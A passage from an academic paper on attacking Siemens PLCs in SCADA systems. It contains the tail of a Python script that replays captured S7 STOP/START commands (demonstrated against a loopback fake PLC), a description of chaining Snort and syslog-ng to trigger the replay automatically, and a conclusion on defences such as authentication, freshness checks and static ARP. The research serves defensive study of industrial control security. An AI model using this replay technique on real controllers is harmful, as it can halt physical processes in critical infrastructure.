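            s.sendall(p)
            try:
                reply = recv_tpkt(s)
            except socket.timeout:
                reply = None
            replies.append(reply)
            if reply is None:
                break        # no answer: stop rather than push later requests out of order
    return replies


def fake_plc(listener, received, count):
    """Loopback stand-in for the PLC: records each request and answers it with an S7
    ack_data PDU (ROSCTR 3) carrying the same PDU reference, as the real one would."""
    conn, _ = listener.accept()
    with conn:
        for _ in range(count):
            msg = recv_tpkt(conn)
            if msg is None:
                break
            received.append(msg)
            s7 = msg[7:]                                   # after TPKT(4) + COTP DT(3)
            ack = b"\x32\x03" + s7[2:6] + b"\x00" * 6       # hdr: ref, lens 0, no error
            conn.sendall(struct.pack("!BBH", 3, 0, 7 + len(ack)) + b"\x02\xf0\x80" + ack)


def demo():
    """Replay STOP then START against the loopback PLC; returns (requests seen, replies)."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    received = []
    t = threading.Thread(target=fake_plc, args=(listener, received, 2), daemon=True)
    t.start()
    replies = replay("127.0.0.1", listener.getsockname()[1], [CAPTURED_STOP, CAPTURED_START])
    t.join(3)
    listener.close()
    return received, replies


if __name__ == "__main__":
    seen, replies = demo()
    for req, rep in zip(seen, replies):
        print("sent %d bytes, got ack_data ref=%s" % (len(req), rep[11:13].hex()))
```

In a real capture the first PCS7-to-PLC payloads are the COTP connection request and the S7 "setup communication" job; since the paper's cleaning step keeps every packet in that direction, they are simply the first entries of the payload list and are replayed in order. The point the example makes is the one the paper reaches by experiment: nothing in the exchange ties a request to the host that recorded it, so whoever can open a TCP connection to port 102 can issue the command.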

Snort is an IDS that can only detect known patterns in network traffic. The stealth command modification attack, however, requires the replay attack (the Python program above) to be launched as soon as a command is detected in the traffic. To fill this gap, Snort is configured to log its alerts to the syslog-ng utility [20], and syslog-ng in turn is configured to trigger the replay attack upon receiving the corresponding Snort alerts.

8. Conclusion

Securing SCADA systems is a major concern worldwide, as such systems are responsible for the daily operation of modern critical infrastructures and industries. In this work, we demonstrated that a SCADA system can be seriously compromised by mounting network attacks targeting PLCs. PLCs are very common components in SCADA systems. They sit between HMIs and field devices and are in charge of sending commands to and receiving data from field devices. Since a PLC is programmable, it can be completely compromised by loading a malicious control program. Through the detailed description and implementation of three attacks (replay, MITM, and command modification), we showed that the communication between the PLC and the engineering station can be compromised, leading to serious SCADA system instability. We showed that, with open source tools and simple Python scripts, one can mount successful attacks. In particular, programming and configuration traffic directed to PLCs may be replayed, sniffed, and/or modified. PLCs can be protected against the discussed attacks mainly by providing a level of encryption for the transferred packets; note that, to stop replay and modification rather than only eavesdropping, the packets must also be authenticated and carry freshness information (a sequence number or nonce), since an encrypted command that is simply recorded can still be replayed verbatim. Adding such protection can be a challenge, especially given the small memory of PLCs, which makes it difficult to perform encryption and decryption inside the PLC. However, hardware cipher modules can be attached to the PLCs as extension modules. In addition, static ARP table entries can provide a level of defense against MITM attacks. Finally, the PLC response time during normal communication is slightly lower than while under a MITM attack; this difference can be used to detect and prevent MITM attacks.

Acknowledgment

The authors would like to acknowledge the support of the National Science, Technology and Innovation Plan (NSTIP) under project number 13-INF281-04.

References

[1] A. Nicholson, S. Webber, S. Dyer, T. Patel, H. Janicke, SCADA security in the light of cyber-warfare, Computers & Security 31(4) (2012) 418–436.
[2] N. Falliere, L. Murchu, E. Chien, W32.Stuxnet Dossier, Symantec Security Response (2011).
[3] S. Zhioua, The Middle East under malware attack: Dissecting cyber weapons, Proceedings of the IEEE ICDCS Workshop on Network Forensics, Security and Privacy (NFSP) (2013).
[4] D. Beresford, Exploiting Siemens Simatic S7 PLCs, Black Hat USA (2011).
[5] P. Huitsing, R. Chandia, M. Papa, S. Shenoi, Attack taxonomies for the Modbus protocol, International Journal of Critical Infrastructure Protection 1 (2008) 37–44.
[6] W. Gao, T. Morris, B. Reaves, D. Richey, SCADA control system command and response injection and intrusion detection, eCrime Researchers Summit (eCrime) (2010) 1–9.
[7] L. Pietre-Cambacedes, M. Tritschler, G. Ericsson, Cybersecurity myths on power control systems: 21 misconceptions and false beliefs, IEEE Transactions on Power Delivery 26(1) (2011) 161–172.
[8] Y. Yang, K. McLaughlin, T. Littler, S. Sezer, E.G. Im, Z. Yao, B. Pranggono, H. Wang, Man-in-the-middle attack test-bed investigating cyber-security vulnerabilities in smart grid SCADA systems, Proceedings of the International Conference on Sustainable Power Generation and Supply (SUPERGEN) (2012) 1–8.
[9] T. Morris, W. Gao, Industrial control system cyber attacks, Proceedings of the First International Symposium on ICS & SCADA Cyber Security Research (ICS-CSR) (2013) 22–29.
[10] P. Maynard, K. McLaughlin, B. Haberler, Towards understanding man-in-the-middle attacks on IEC 60870-5-104 SCADA networks, Proceedings of the Second International Symposium on ICS & SCADA Cyber Security Research (ICS-CSR) (2014) 30–42.
[11] Modbus Organization, Modbus protocol specification, http://www.modbus.org.
[12] K. McLaughlin, S. Sezer, P. Smith, Z. Ma, F. Skopik, PRECYSE: Cyber-attack detection and response for industrial control systems, Proceedings of the Second International Symposium on ICS & SCADA Cyber Security Research (ICS-CSR) (2014) 67–71.
[13] Siemens AG, The SIMATIC PCS 7 process control system brochure, April 2013.
[14] Network Working Group, ISO transport protocol specification (RFC 905), April 1984.
[15] G. Devarajan, Unraveling SCADA protocols: Using Sulley fuzzer, Proceedings of DEFCON 15 (2007).
[16] tcpreplay, http://tcpreplay.synfin.net.
[17] P. Biondi, Scapy, http://www.secdev.org/projects/scapy.
[18] ALoR, NaGA, Ettercap, http://ettercap.sourceforge.net.
[19] M. Roesch, Snort: Lightweight intrusion detection for networks, Proceedings of LISA '99 (1999) 229–238.
[20] R. Gerhards, The syslog protocol (RFC 5424), March 2009.
